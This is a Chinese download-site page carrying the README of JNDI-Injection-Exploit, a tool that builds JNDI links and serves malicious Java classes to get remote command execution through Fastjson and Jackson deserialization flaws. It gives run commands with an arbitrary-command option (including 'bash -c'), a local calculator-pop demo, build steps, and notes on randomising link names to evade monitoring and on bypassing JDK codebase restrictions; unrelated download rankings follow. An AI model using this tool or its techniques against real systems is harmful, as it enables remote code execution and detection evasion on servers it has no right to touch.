資料介紹
軟件簡(jiǎn)介
JNDI-Injection-Exploit —— JNDI 注入利用工具,生成 JNDI 鏈接并啟動(dòng)后端相關(guān)服務(wù),可用于 Fastjson、Jackson 等相關(guān)漏洞的驗(yàn)證。
使用
可執(zhí)行程序?yàn)?jar 包,在命令行中運(yùn)行以下命令:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
其中:
-
-C?- 遠(yuǎn)程 class 文件中要執(zhí)行的命令。
(可選項(xiàng) , 默認(rèn)命令是 mac 下打開計(jì)算器,即"open /Applications/Calculator.app")
-
-A?- 服務(wù)器地址,可以是 IP 地址或者域名。
(可選項(xiàng) , 默認(rèn)地址是第一個(gè)網(wǎng)卡地址)
注意:
-
要確保?1099、1389、8180?端口可用,不被其他程序占用。
或者你也可以在 run.ServerStart 類 26~28 行更改默認(rèn)端口。
-
命令會(huì)被作為參數(shù)傳入?Runtime.getRuntime().exec(),
所以需要確保命令傳入 exec() 方法可執(zhí)行。
bash等可在shell直接執(zhí)行的相關(guān)命令需要加雙引號(hào),比如說 java -jar JNDI.jar -C "bash -c ..."
示例
本地演示:
-
啟動(dòng) JNDI-Injection-Exploit:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
我們需要把第一步中生成的 JNDI 鏈接注入到存在漏洞的應(yīng)用環(huán)境中,方便解釋用如下代碼模仿漏洞環(huán)境:
public static void main(String[] args) throws Exception{
InitialContext ctx = new InitialContext();
ctx.lookup("rmi://127.0.0.1/fgf4fp");
}
當(dāng)上面代碼運(yùn)行后,應(yīng)用便會(huì)執(zhí)行相應(yīng)命令,這里是彈出計(jì)算器,沒截圖,可以自己測(cè)一下。
截圖是工具的server端日志:
安裝
下面兩種方法都可以得到Jar包
-
把源碼下載到本地然后自行編譯打包。(在Java1.7+ 、Java1.8+ 和 Maven 3.x+環(huán)境下測(cè)試可以)
$ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
$ cd JNDI-Injection-Exploit
$ mvn clean package -DskipTests
工具實(shí)現(xiàn)
- 首先生成的鏈接后面codebaseClass是6位隨機(jī)的,這個(gè)是因?yàn)椴幌M尮ぞ呱傻逆溄颖旧沓蔀橐环N特征被監(jiān)控或攔截。
- 服務(wù)器地址實(shí)際就是codebase地址,相比于marshalsec中的JNDI server來說,這個(gè)工具把JNDI server和HTTP server綁定到一起,并自動(dòng)啟動(dòng)HTTP server返回相應(yīng)class,更自動(dòng)化了。
- HTTP server基于jetty實(shí)現(xiàn)的,本質(zhì)上是一個(gè)能下載文件的servlet,比較有意思的是我提前編譯好class模板放到resource目錄,然后servlet會(huì)讀取class文件,使用ASM框架對(duì)讀取的字節(jié)碼進(jìn)行修改,然后插入我們想要執(zhí)行的命令,返回修改后的字節(jié)碼。
待實(shí)現(xiàn)
- (已完成EL表達(dá)式繞過部分)在更高版本的 JDK 環(huán)境中 trustURLCodebase 變量為 false,限制了遠(yuǎn)程類的加載,我會(huì)找時(shí)間把JNDI-Injection-Bypass這個(gè)項(xiàng)目的東西融入到本項(xiàng)目中,生成能繞過 JDK 限制 JNDI 鏈接。
- 常用串口通信測(cè)試工具sscom 2次下載
- 基于OTA升級(jí)的ESP01S固件測(cè)試工具 19次下載
- 可提升樣本程序軟件質(zhì)量的自動(dòng)化測(cè)試工具 19次下載
- modbus調(diào)試工具
- 藍(lán)牙調(diào)試工具BTool v1.40.5資源下載 27次下載
- 納米器件的測(cè)試工具資料下載
- USB-TTL測(cè)試工具應(yīng)用程序免費(fèi)下載 131次下載
- TC35短信收發(fā)測(cè)試工具下載 7次下載
- cpu性能測(cè)試工具(ORTHOS)中文版免費(fèi)下載 0次下載
- 滲透測(cè)試工具開發(fā) 18次下載
- TCP/UDPDbg測(cè)試工具 313次下載
- 軟件測(cè)試工具的分類和使用 68次下載
- ICOM多串口卡測(cè)試工具
- TD-SCDMA測(cè)試工具體系及應(yīng)用
- TD-SCDMA網(wǎng)絡(luò)測(cè)試工具及手段
- Linux下的stress-ng壓力測(cè)試工具介紹 6266次閱讀
- 多核應(yīng)用調(diào)試工具CodeViser介紹 794次閱讀
- T900串口測(cè)試工具的使用教程 1999次閱讀
- 命令執(zhí)行不回顯利用工具解讀 1034次閱讀
- 測(cè)試工具的主要目的 933次閱讀
- 如何使用DudeSuite進(jìn)行滲透測(cè)試工作 1377次閱讀
- 基于安卓的滲透測(cè)試工具集 1064次閱讀
- 詳解半導(dǎo)體封裝測(cè)試工藝 1421次閱讀
- 基于QT的串口調(diào)試工具設(shè)計(jì) 2022次閱讀
- 滲透測(cè)試工具箱siusiu的特性及使用 2555次閱讀
- 一種開源滲透測(cè)試工具toxssin介紹 1300次閱讀
- 介紹一款功能強(qiáng)大的自動(dòng)化Deauth滲透測(cè)試工具 1125次閱讀
- 常用藍(lán)牙調(diào)試工具分享 6220次閱讀
- 123個(gè)Python滲透測(cè)試工具你了解多少黑客資源 5561次閱讀
- 常用的軟件測(cè)試工具有哪些_10款常用的軟件測(cè)試工具推薦 7.5w次閱讀
下載排行
本周
- 1山景DSP芯片AP8248A2數(shù)據(jù)手冊(cè)
- 1.06 MB | 532次下載 | 免費(fèi)
- 2RK3399完整板原理圖(支持平板,盒子VR)
- 3.28 MB | 339次下載 | 免費(fèi)
- 3TC358743XBG評(píng)估板參考手冊(cè)
- 1.36 MB | 330次下載 | 免費(fèi)
- 4DFM軟件使用教程
- 0.84 MB | 295次下載 | 免費(fèi)
- 5元宇宙深度解析—未來的未來-風(fēng)口還是泡沫
- 6.40 MB | 227次下載 | 免費(fèi)
- 6迪文DGUS開發(fā)指南
- 31.67 MB | 194次下載 | 免費(fèi)
- 7元宇宙底層硬件系列報(bào)告
- 13.42 MB | 182次下載 | 免費(fèi)
- 8FP5207XR-G1中文應(yīng)用手冊(cè)
- 1.09 MB | 178次下載 | 免費(fèi)
本月
- 1OrCAD10.5下載OrCAD10.5中文版軟件
- 0.00 MB | 234315次下載 | 免費(fèi)
- 2555集成電路應(yīng)用800例(新編版)
- 0.00 MB | 33566次下載 | 免費(fèi)
- 3接口電路圖大全
- 未知 | 30323次下載 | 免費(fèi)
- 4開關(guān)電源設(shè)計(jì)實(shí)例指南
- 未知 | 21549次下載 | 免費(fèi)
- 5電氣工程師手冊(cè)免費(fèi)下載(新編第二版pdf電子書)
- 0.00 MB | 15349次下載 | 免費(fèi)
- 6數(shù)字電路基礎(chǔ)pdf(下載)
- 未知 | 13750次下載 | 免費(fèi)
- 7電子制作實(shí)例集錦 下載
- 未知 | 8113次下載 | 免費(fèi)
- 8《LED驅(qū)動(dòng)電路設(shè)計(jì)》 溫德爾著
- 0.00 MB | 6656次下載 | 免費(fèi)
總榜
- 1matlab軟件下載入口
- 未知 | 935054次下載 | 免費(fèi)
- 2protel99se軟件下載(可英文版轉(zhuǎn)中文版)
- 78.1 MB | 537798次下載 | 免費(fèi)
- 3MATLAB 7.1 下載 (含軟件介紹)
- 未知 | 420027次下載 | 免費(fèi)
- 4OrCAD10.5下載OrCAD10.5中文版軟件
- 0.00 MB | 234315次下載 | 免費(fèi)
- 5Altium DXP2002下載入口
- 未知 | 233046次下載 | 免費(fèi)
- 6電路仿真軟件multisim 10.0免費(fèi)下載
- 340992 | 191187次下載 | 免費(fèi)
- 7十天學(xué)會(huì)AVR單片機(jī)與C語言視頻教程 下載
- 158M | 183279次下載 | 免費(fèi)
- 8proe5.0野火版下載(中文版免費(fèi)下載)
- 未知 | 138040次下載 | 免費(fèi)
評(píng)論
查看更多